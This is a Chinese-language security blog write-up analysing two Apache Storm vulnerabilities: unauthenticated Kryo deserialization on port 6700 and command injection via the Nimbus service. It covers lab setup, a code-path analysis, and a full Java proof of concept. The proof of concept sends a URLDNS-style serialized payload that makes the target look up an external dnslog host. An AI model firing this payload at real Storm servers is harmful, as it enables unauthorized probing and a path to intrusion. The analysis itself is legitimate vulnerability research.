警告
本文最后更新于 2021-11-01 ,文中内容可能已过时。
看到GitHub的安全实验室又出了两篇漏洞分析,我就看一下。
GHSL-2021-086: Unsafe Deserialization in Apache Storm supervisor - CVE-2021-40865 GHSL-2021-085:Apache Storm Nimbus 中的命令注入 - CVE-2021-38294 搭环境非常恶心,需要zookeeper和storm,并且需要在Linux上,因为CVE-2021-38294命令注入只在Linux上有。
下载链接:
https://dlcdn.apache.org/zookeeper/zookeeper-3.7.0/apache-zookeeper-3.7.0-bin.tar.gz https://apache.mirror.iphh.net/storm/apache-storm-2.2.0/apache-storm-2.2.0.zip zookeeper启动
1
2
cp zookeeper/conf/zoo_sample.cfg zookeeper/conf/zoo.cfg
./bin/zkServer.sh start
storm配置,注释掉以下几行,并修改为自己的ip
1
2
3
4
storm.zookeeper.servers :
- "192.168.137.138"
nimbus.seeds : [ "192.168.137.138" ]
ui.port : 8081
然后先启动zookeeper以后启动storm
1
2
3
4
cd storm/bin
python3 storm.py nimbus
python3 storm.py supervisor
python3 storm.py ui
然后8081端口就是ui的web服务
然后需要添加计算作业Topology
创建一个maven项目,修改pom文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns= "http://maven.apache.org/POM/4.0.0"
xmlns:xsi= "http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation= "http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd" >
<modelVersion> 4.0.0</modelVersion>
<groupId> org.example</groupId>
<artifactId> stormJob</artifactId>
<version> 1.0-SNAPSHOT</version>
<properties>
<maven.compiler.source> 8</maven.compiler.source>
<maven.compiler.target> 8</maven.compiler.target>
</properties>
<dependencies>
<dependency>
<groupId> org.apache.storm</groupId>
<artifactId> storm-core</artifactId>
<version> 2.2.0</version>
</dependency>
</dependencies>
</project>
创建sum.ClusterSumStormTopology类
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
package sum ;
import java.util.Map ;
import org.apache.storm.Config ;
import org.apache.storm.StormSubmitter ;
import org.apache.storm.generated.AlreadyAliveException ;
import org.apache.storm.generated.AuthorizationException ;
import org.apache.storm.generated.InvalidTopologyException ;
import org.apache.storm.spout.SpoutOutputCollector ;
import org.apache.storm.task.OutputCollector ;
import org.apache.storm.task.TopologyContext ;
import org.apache.storm.topology.OutputFieldsDeclarer ;
import org.apache.storm.topology.TopologyBuilder ;
import org.apache.storm.topology.base.BaseRichBolt ;
import org.apache.storm.topology.base.BaseRichSpout ;
import org.apache.storm.tuple.Fields ;
import org.apache.storm.tuple.Tuple ;
import org.apache.storm.tuple.Values ;
import org.apache.storm.utils.Utils ;
public class ClusterSumStormTopology {
/**
* Spout需要继承BaseRichSpout
* 产生数据并且发送出去
* */
public static class DataSourceSpout extends BaseRichSpout {
private SpoutOutputCollector collector ;
/**
* 初始化方法,在执行前只会被调用一次
* @param conf 配置参数
* @param context 上下文
* @param collector 数据发射器
* */
public void open ( Map conf , TopologyContext context , SpoutOutputCollector collector ) {
this . collector = collector ;
}
int number = 0 ;
/**
* 产生数据,生产上一般是从消息队列中获取数据
* */
public void nextTuple () {
this . collector . emit ( new Values ( ++ number ));
System . out . println ( "spout发出:" + number );
Utils . sleep ( 1000 );
}
/**
* 声明输出字段
* @param declarer
* */
public void declareOutputFields ( OutputFieldsDeclarer declarer ) {
/**
* num是上nextTuple中emit中的new Values对应的。上面发几个,这里就要定义几个字段。
* 在bolt中获取的时候,只需要获取num这个字段就行了。
* */
declarer . declare ( new Fields ( "num" ));
}
}
/**
* 数据的累计求和Bolt
* 接收数据并且处理
* */
public static class SumBolt extends BaseRichBolt {
/**
* 初始化方法,只会被执行一次
* */
public void prepare ( Map stormConf , TopologyContext context , OutputCollector collector ) {
}
int sum = 0 ;
/**
* 获取spout发送过来的数据
* */
public void execute ( Tuple input ) {
//这里的num就是在spout中的declareOutputFields定义的字段名
//可以根据index获取,也可以根据上一个环节中定义的名称获取
Integer value = input . getIntegerByField ( "num" );
sum += value ;
System . out . println ( "Bolt:sum=" + sum );
}
/**
* 声明输出字段
* @param declarer
* */
public void declareOutputFields ( OutputFieldsDeclarer declarer ) {
}
}
public static void main ( String [] args ){
//TopologyBuilder根据spout和bolt来构建Topology
//storm中任何一个作业都是通过Topology方式进行提交的
//Topology中需要指定spout和bolt的执行顺序
TopologyBuilder tb = new TopologyBuilder ();
tb . setSpout ( "DataSourceSpout" , new DataSourceSpout ());
//SumBolt以随机分组的方式从DataSourceSpout中接收数据
tb . setBolt ( "SumBolt" , new SumBolt ()). shuffleGrouping ( "DataSourceSpout" );
//代码提交到storm集群上运行
try {
StormSubmitter . submitTopology ( "ClusterSumStormTopology" , new Config (), tb . createTopology ());
} catch ( AlreadyAliveException e ) {
e . printStackTrace ();
} catch ( InvalidTopologyException e ) {
e . printStackTrace ();
} catch ( AuthorizationException e ) {
e . printStackTrace ();
}
}
}
然后maven打jar包传到storm机器上。
然后运行
1
2
python3 storm.py jar /home/ubuntu/stormJob-1.0-SNAPSHOT.jar sum.ClusterSumStormTopology
python3 storm.py list
list之后可以看到任务在运行才算成功。
原因在于6700端口对于数据的处理先进行了反序列化,然后才校验身份验证。
org.apache.storm.messaging.netty.StormServerPipelineFactory
按顺序注册
MessageDecoder SaslStormServerHandler SaslStormServerAuthorizeHandler StormServerHandler MessageDecoder重写了decode方法,对传入数据进行解码。
然后从buf中读一个Short值,当等于-600时,进入BackPressureStatus.read(bytes, this.deser)
然后进行KryoValuesDeserializer.deserializeObject(byte)
其中KryoValuesDeserializer是StormServerPipelineFactory传入的new KryoValuesDeserializer(this.topoConf))
其中SerializationFactory.getKryo(conf)
从序列化工厂中取出反序列化对象
通过conf.get(“topology.kryo.factory”)取出传入conf中的反序列化工厂,poc中构造的为org.apache.storm.serialization.DefaultKryoFactory
,取出工厂类之后,进一步调用DefaultKryoFactory.getKryo(conf)
20行这里返回了一个KryoSerializableDefault()实例。
这里需要注意44行当this.override为true时,会返回一个new SerializableSerializer()
。它直接调用ObjectInputStream进行序列化和反序列化
那么this.override何时为true呢?
当调用了DefaultKryoFactory的postRegister()时会返回一个由ObjectInputStream进行序列化和反序列化的类。
然后org/apache/storm/serialization/SerializationFactory.class:92
这个地方调用postRegister(),所以达到反序列化任意对象的效果。
poc如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
package com.test ;
import org.apache.storm.serialization.KryoValuesSerializer ;
import java.io.ByteArrayOutputStream ;
import java.io.IOException ;
import java.io.OutputStream ;
import java.lang.reflect.Field ;
import java.math.BigInteger ;
import java.net.* ;
import java.util.HashMap ;
public class Main {
public static byte [] buffer ( KryoValuesSerializer ser , Object obj ) throws IOException {
byte [] payload = ser . serializeObject ( obj );
BigInteger codeInt = BigInteger . valueOf ( - 600 );
byte [] code = codeInt . toByteArray ();
BigInteger lengthInt = BigInteger . valueOf ( payload . length );
byte [] length = lengthInt . toByteArray ();
ByteArrayOutputStream outputStream = new ByteArrayOutputStream ();
outputStream . write ( code );
outputStream . write ( new byte [] { 0 , 0 });
outputStream . write ( length );
outputStream . write ( payload );
return outputStream . toByteArray ();
}
public static KryoValuesSerializer getSerializer () throws MalformedURLException {
HashMap < String , Object > conf = new HashMap <> ();
conf . put ( "topology.kryo.factory" , "org.apache.storm.serialization.DefaultKryoFactory" );
conf . put ( "topology.tuple.serializer" , "org.apache.storm.serialization.types.ListDelegateSerializer" );
conf . put ( "topology.skip.missing.kryo.registrations" , false );
conf . put ( "topology.fall.back.on.java.serialization" , true );
return new KryoValuesSerializer ( conf );
}
public static void main ( String [] args ) {
try {
// Payload construction
URLStreamHandler handler = new SilentURLStreamHandler ();
String url = "http://aqa13.dnslog.cn" ;
HashMap ht = new HashMap (); // HashMap that will contain the URL
URL u = new URL ( null , url , handler ); // URL to use as the Key
ht . put ( u , url ); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
Field hashCode = u . getClass (). getDeclaredField ( "hashCode" );
hashCode . setAccessible ( true );
hashCode . set ( u , - 1 );
// Kryo serialization
byte [] bytes = buffer ( getSerializer (), ht );
// Send bytes
Socket socket = new Socket ( "192.168.137.138" , 6700 );
OutputStream outputStream = socket . getOutputStream ();
outputStream . write ( bytes );
outputStream . flush ();
outputStream . close ();
} catch ( Exception e ) {
e . printStackTrace ();
}
}
static class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection ( URL u ) throws IOException {
return null ;
}
protected synchronized InetAddress getHostAddress ( URL u ) {
return null ;
}
}
}
RCE的话没找到gadget http://noahblog.360.cn/apache-storm-vulnerability-analysis/ 写的是错的
命令注入,端口 6627 上公开了许多服务,可以未授权链接调用
user参数传入isUserPartOf()
继续传递到this.groupMapper.getGroups(user)
继续传递
拼接参数执行命令造成命令注入。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。